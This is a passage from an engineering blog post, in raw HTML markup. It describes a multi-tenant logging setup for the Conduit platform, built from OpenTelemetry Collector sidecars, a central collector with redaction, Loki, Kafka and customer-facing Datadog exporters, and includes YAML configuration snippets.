    style=&quot;padding-bottom: 50.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAABYlAAAWJQFJUiTwAAAA+UlEQVR42n2SCQqFMAxEe/97KtQN913zeYGBKh8DoTXJTCeJwRI7jsPWdbVt2+y6Lj9x4th937bvu8eoI36ep7vuQWQQUASARNd1fie2LIsD8KZpbBgG93Ec/RHhH4QkAOIUTtPkdxECwCEix4PcU0EPQpHifd87EQCKKBZI7aOePCem1h+EMpGhRAA9CEg2z7PX0QEi/hIComUKaEuFqULNDcKqqqyua3dyQUkBIGOLUgcZMcDasjbKqW9O8AEwmyuKwhXpV0EZLkDbtq6Gh1IRbwvMqyxLizE6AFLk53luWZY5EcTkRPpJqM1qfukvkM6LwaMO9V/2A9WyECEICPMCAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Logging High-level architecture diagram&quot;
        title=&quot;&quot;
        src=&quot;/static/8610669c8800bb415084cf5242effb8e/5a190/logging-high-level-arch.png&quot;
        srcset=&quot;/static/8610669c8800bb415084cf5242effb8e/772e8/logging-high-level-arch.png 200w,
/static/8610669c8800bb415084cf5242effb8e/e17e5/logging-high-level-arch.png 400w,
/static/8610669c8800bb415084cf5242effb8e/5a190/logging-high-level-arch.png 800w,
/static/8610669c8800bb415084cf5242effb8e/c1b63/logging-high-level-arch.png 1200w,
/static/8610669c8800bb415084cf5242effb8e/29007/logging-high-level-arch.png 1600w,
/static/8610669c8800bb415084cf5242effb8e/90eea/logging-high-level-arch.png 2254w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Here’s a quick summary of the major components:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; (with sidecar collectors): Each Conduit instance runs with an OpenTelemetry Collector sidecar. These sidecars are responsible for capturing logs ‘locally’, close to where they&apos;re emitted, and forwarding them upstream.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Central OpenTelemetry Collector:&lt;/strong&gt; This component aggregates log data from all Conduit pods. It performs some basic processing and routing to downstream systems like Kafka and Loki.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://grafana.com/docs/loki/latest/&quot;&gt;Loki&lt;/a&gt;: Used as our primary store for customer logs. We query the relevant data using it’s REST API and display it in our UI. As part of the Loki configuration we also control the retention period. We are fairly aggressive in pruning the logs as we’ve found that in our use cases logs lose their relevance quickly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Kafka:&lt;/strong&gt; Serves as a transport layer for logs that need to be exported to customer-specific destinations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Customer-Facing Collector:&lt;/strong&gt; A separate OpenTelemetry Collector consumes from Kafka and exports logs to external systems, such as &lt;strong&gt;Datadog&lt;/strong&gt;, giving users access to their own application logs and metrics.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Except for Kafka, all this is on a &lt;strong&gt;per-tenant&lt;/strong&gt; basis.&lt;/p&gt;
&lt;h2&gt;Open Telemetry All The Things&lt;/h2&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/069cf338b1ccae72aef398dfb21a58f3/ce0a7/otel-all-things.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 77.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAABYlAAAWJQFJUiTwAAADOUlEQVR42l1SW0hUURQ9M2pvsvqIqMAgir7qI6EXEUVRRB9F/RQkZmY/jQ8i0jJKspIwpRAnIiEM8aMw8Ken0VPpYY/JTBSLGUezmSbnVc7c12qde685dmCx99137bUf5wikHF3XTRiGgf+PjEciEfT29qKvrw+apqX8HeeLiWnWDymoqip8Ph/a29vR1taGgoICVFZWIj8/Hy6XC9FozObqExSEoiiIxeIYGhrEw4cvcelSLcrLTxDlyMs7gIqKCtTXu9Hc3AyPx0NulJ1GkUj8sSWSxMC4YElJMXJz85CTsxctLbmoqTmP0tJTxDHU1tZRuAxXr9ab5LEx+/s98Hr99Di6vpNd3hpbDMSzZ0/x6dN7JJMGE9YxuA2NjdUoKzuCqqpdaGi4gt6+Qsi1qooc7yIi4esIBI6ZG9ONQ//EUnaomQm6XgNVE1DURfSrGV/B+Fn6q+l76W+jTcfwj6X4NSJTsxmLT9i/0PQQE/rtUDcrTucYgn4avL40fOnZgK7PexD8mcVOsznqZsZl0QxmPMJYQ5agJjtMsMoJohjS1419piAoODiUic7OywgGh/H4cQuamh7h9etmFhEmzzqqDSN1ZIWErUQWscnuUKCnpxCtrc9RVFSEefMW8vJykBhVKZqd0l3StiPM+SAFNXvcFxSbRggKOs1awZ9zceNGHTIzZ0MIgcWLF+G7P4qOF/vJ282cRvJ+c7rT/N5Oe08KKnaFbwyuShFMQywu8PXrFbjdN03BtetXY7BzCG+Pb6TYLO7+MPmziS3mE0oZOUB08cdpU1CGozGnufzu7gV497ED1e46PPj4HN4z9+Cfvx/hxGTr2ei1E2/ZwF22eoFCk0yCojgw4HfCN+BEctQpnyreV23Fr32tCOxwYzS9HOH0Unx/M5X8lTC0W5RqIm4TryCsMSfzYwbCEdmVk9ZhVVctO/xkDkKiEHCUAhmnkBSV8F9bZhbTVac5lW7MZGMHZYf37YAD8d8O82FLEXnTmu2HQmkILDlM9xz0jJO0F+AtWcPHkgFD3cNp75AXHt+hYRw1RQ047UsRltWsDke+TUFojotuBYx0KViFAVc2BZfzkYRTdqjjL1UBGZJj8g3JAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Open Telemetry all the things&quot;
        title=&quot;&quot;
        src=&quot;/static/069cf338b1ccae72aef398dfb21a58f3/5a190/otel-all-things.png&quot;
        srcset=&quot;/static/069cf338b1ccae72aef398dfb21a58f3/772e8/otel-all-things.png 200w,
/static/069cf338b1ccae72aef398dfb21a58f3/e17e5/otel-all-things.png 400w,
/static/069cf338b1ccae72aef398dfb21a58f3/5a190/otel-all-things.png 800w,
/static/069cf338b1ccae72aef398dfb21a58f3/c1b63/otel-all-things.png 1200w,
/static/069cf338b1ccae72aef398dfb21a58f3/ce0a7/otel-all-things.png 1590w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;As you can see from the architecture, we’ve leaned heavily on the OpenTelemetry Collector.  We’ve made use of the OpenTelemetry Collector because it gave us a lot of what we needed out of the box. Flexibility, a big ecosystem of extensions, and a clean way to decouple log collection from our application code. From sidecar collectors, to centralized processing, to exporting logs to external systems here’s how we put it all together.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sidecar Logging&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;One of the key areas where we wanted to provide visibility was around the provisioning and operation of data pipelines running inside Conduit. These processes handle the actual data movement between sources and destinations, so observability here is critical.&lt;/p&gt;
&lt;p&gt;In the Kubernetes world, the usual options for log collection are DaemonSets or sidecars. We initially explored using a DaemonSet, but ruled it out fairly quickly. Since we’re running a multi-tenant setup, where Conduit pods from different customers can land on the same node , a DaemonSet would make it difficult to reliably separate and route logs per tenant.&lt;/p&gt;
&lt;p&gt;With the sidecar approach, we get fine-grained control. By using the &lt;a href=&quot;https://kubernetes.io/docs/concepts/workloads/pods/downward-api/&quot;&gt;Kubernetes downward API&lt;/a&gt; along with the OpenTelemetry Collector’s &lt;code class=&quot;language-text&quot;&gt;filelog&lt;/code&gt; receiver, we’re able to pick up the right logs from the host and forward them to the appropriate downstream pipeline, all while preserving tenant isolation.
The &lt;a href=&quot;https://opentelemetry.io/docs/platforms/kubernetes/operator/&quot;&gt;OpenTelemetry Operator&lt;/a&gt; made this even easier. We just define the collector config and annotate our Conduit pods, and the operator takes care of injecting and managing the sidecars for us.&lt;/p&gt;
&lt;p&gt;Also, because a single customer application can involve multiple Conduit processes, we needed a way to consistently tie those logs back to the correct context. Here again, the downward API and the Collector’s &lt;code class=&quot;language-text&quot;&gt;resource&lt;/code&gt; processor come in handy letting us attach the necessary metadata to each log record before it leaves the pod.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt; &lt;span class=&quot;token key atrule&quot;&gt;Annotations&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; 
	 &lt;span class=&quot;token key atrule&quot;&gt;sidecar.opentelemetry.io/inject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;true                                                                                                                      sidecar.opentelemetry.io/inject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean important&quot;&gt;true&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;em&gt;Annotation on Conduit pod for sidecar management&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;env&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; POD_NAMESPACE
    &lt;span class=&quot;token key atrule&quot;&gt;valueFrom&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;fieldRef&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; 
        &lt;span class=&quot;token key atrule&quot;&gt;fieldPath&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; metadata.namespace 
&lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;        
&lt;span class=&quot;token key atrule&quot;&gt;receivers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
	&lt;span class=&quot;token key atrule&quot;&gt;filelog&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
		&lt;span class=&quot;token key atrule&quot;&gt;include&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
	   &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; /var/log/pods/$&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;POD_NAMESPACE&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;_$&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;POD_NAME&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;_&lt;span class=&quot;token important&quot;&gt;*/conduit-server/*.log&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;resource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;action&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; insert
            &lt;span class=&quot;token key atrule&quot;&gt;key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; app.id
            &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;APP_ID&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
 &lt;span class=&quot;token key atrule&quot;&gt;exporters&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;otlp&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;endpoint&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;CENTRAL_COLLECTOR&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;em&gt;Configuration snippet for the Open Telemetry Collector running as the sidecar&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Central Open Telemetry Collector&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;At the core is a central OpenTelemetry Collector instance. This acts as the main aggregation and processing point for all logs coming in from the sidecars. Besides routing the logs to the downstream systems, we also leverage the &lt;code class=&quot;language-text&quot;&gt;redaction&lt;/code&gt; processor to make sure sensitive data isn’t stored or exported.&lt;/p&gt;
&lt;p&gt;One of the biggest advantages of this setup is the clean decoupling it gives us. Sidecars focus only on local log capture and forwarding, while the central collector can evolve independently. Allowing us to adjust processing logic, add exporters, or even further adopt the &lt;a href=&quot;https://opentelemetry.io/docs/collector/deployment/gateway/&quot;&gt;gateway deployment pattern&lt;/a&gt; without touching tenant workloads.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;env&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; KAFKA_BOOTSTRAP_SERVERS
    &lt;span class=&quot;token key atrule&quot;&gt;valueFrom&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;secretKeyRef&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; .Values.kafka.secret.name &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; .Values.kafka.secret.key &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;optional&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean important&quot;&gt;true&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;args&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;exporters.kafka.brokers=${env:KAFKA_BOOTSTRAP_SERVERS}&apos;&lt;/span&gt;
 &lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
   &lt;span class=&quot;token key atrule&quot;&gt;exporters&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;otlphttp&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;endpoint&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &amp;lt;loki&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;endpoint&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;kafka&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;topic&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &amp;lt;topic&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;name&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;redaction&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;allow_all_keys&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean important&quot;&gt;true&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;blocked_values&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &amp;lt;regex&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;
          &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &amp;lt;regex&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;
          &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &amp;lt;regex&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;em&gt;Configuration snippet for our centralized Open Telemetry Collector&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Customer Collector&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/3d0942d81ee2c13b3a4c17fac6649219/1e088/customer-collector.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 89.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB80lEQVR42q1Ta2/UMBDs//8xCITgGxU61OZKReGqAhJNjgvpQS7Ow3HeuSRTTxpX0EbQk7C08np3PZ59+AgzaxgGHGL/fR3hP69ZwKZpUJYViqIcJctzVHWtbeU/Wc4C8mJZ5AhFgLVjI8/UvfR9/3RA87jKC3hBjK2Q2PwUuAkSuH4IP0wwHAZ4h/hDKLz6IvHycodn5xu8uPDw+msKax1rwO7wlMmiqioopSCCndZ1HbMMta4jUzYyV895wCluv99DSokkkQijWEuESEsYhhBCjP4njg0Re+zbGqmMp0e6yY7Dm+JGBRZ2gjcrF89PrnB85eHtdQwnyO5ByY4l4IgZeQw47V6gcOGkuPwusXIifLIjfFwr3el0ZN11PeI4HlNPkmTUWQrW9QHgMDF0cba1cOYtYW1OsHQtLG9ONUMbVVHpQc/GGnJe2TwyZdPYpNmx2aa/sFhbOHXe4921hePPC3zYrfDNtzF0d3NINvX0e5hu13XzTaFDSZ1a047ntm6hEjXqZEMm5vJfm8JXiqJAmqbY6dkr9ew1bQMRCvi+P6bJRrBWPDM+13+8bds/AU2aBOPLDOLOVAhuusmdPur0m3jGzTJkIFPiIPOHMJDp8SJt1AnIGNrYXcZQnwUkU9InsGFEBrRRN4Wn8Eyh72E9bwEt/3qSXmubRwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Customer collectore architecture diagram&quot;
        title=&quot;&quot;
        src=&quot;/static/3d0942d81ee2c13b3a4c17fac6649219/5a190/customer-collector.png&quot;
        srcset=&quot;/static/3d0942d81ee2c13b3a4c17fac6649219/772e8/customer-collector.png 200w,
/static/3d0942d81ee2c13b3a4c17fac6649219/e17e5/customer-collector.png 400w,
/static/3d0942d81ee2c13b3a4c17fac6649219/5a190/customer-collector.png 800w,
/static/3d0942d81ee2c13b3a4c17fac6649219/1e088/customer-collector.png 840w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;It’s become increasingly common for customers to bring their own observability stack, leveraging tools such as Datadog for logs and metrics. To support that, we have per-observability destination OpenTelemetry Collectors that consume logs from Kafka and forward them directly to the customer’s observability system. With this approach logs from Conduit applications show up alongside the customer’s existing data without having to adopt any additional tooling. Additionally, it helps keeps things like API access keys isolated and scoped to this collector only.&lt;/p&gt;
&lt;p&gt;Kafka played a key role in making this work. Each customer’s downstream collector can independently consume their own logs from Kafka, giving us a nice way to route data per tenant.&lt;/p&gt;
&lt;p&gt;That said, there were some real-world challenges. Because each customer has unique destinations and processing needs, we couldn’t statically define exporters ahead of time. Kafka helped decouple things, but it also introduced some config complexity. The collector assumes a relatively static configuration, which doesn’t mesh well with dynamic environments like ours. Built-in service discovery could go a long way in this regard. Finally, the Kafka receiver and exporter both require broker addresses in the config, but in our case, those are only known at deploy time. We worked around this by using command-line and environment variable overrides. This is workable, but not the smoothest experience.&lt;/p&gt;
&lt;p&gt;We also leverage the Prometheus receiver to collect metrics from our Conduit pods. Conduit provides a number of useful metrics that can be used to generate monitors and alerts. We can use the &lt;code class=&quot;language-text&quot;&gt;kubernetes_sd_configs&lt;/code&gt; to dynamically discover the Conduit pods for metrics collection.  A future iteration could see this move to the centralized Collector or even down to the sidecar, but for now the current solution meets our needs.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;env&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; KAFKA_BOOTSTRAP_SERVERS
    &lt;span class=&quot;token key atrule&quot;&gt;valueFrom&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;secretKeyRef&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; .Values.kafka.secret.name &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; .Values.kafka.secret.key &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;optional&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean important&quot;&gt;true&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;args&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;exporters.kafka.brokers=${env:KAFKA_BOOTSTRAP_SERVERS}&apos;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;receivers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;                                                                                                                                                                             │
   &lt;span class=&quot;token key atrule&quot;&gt;kafka&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;                                                                                                                                                                               │
     &lt;span class=&quot;token key atrule&quot;&gt;topic&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &amp;lt;topic&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;name&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;
   &lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
   &lt;span class=&quot;token key atrule&quot;&gt;prometheus&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
	   &lt;span class=&quot;token key atrule&quot;&gt;kubernetes_sd_configs&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;                                                                                                                                                       │
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;namespaces&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;                                                                                                                                                              │
          &lt;span class=&quot;token key atrule&quot;&gt;names&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;                                                                                                                                                                 │
            &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &amp;lt;namespace&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;                                                                                                                                                             │
         &lt;span class=&quot;token key atrule&quot;&gt;role&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; pod
    &lt;span class=&quot;token key atrule&quot;&gt;relabel_configs&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;                                                                                                                                                             │
       &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;action&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; keep                                                                                                                                                             │
         &lt;span class=&quot;token key atrule&quot;&gt;regex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;server.*                                                                                                                                                  │
         &lt;span class=&quot;token key atrule&quot;&gt;source_labels&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;                                                                                                                                                           │
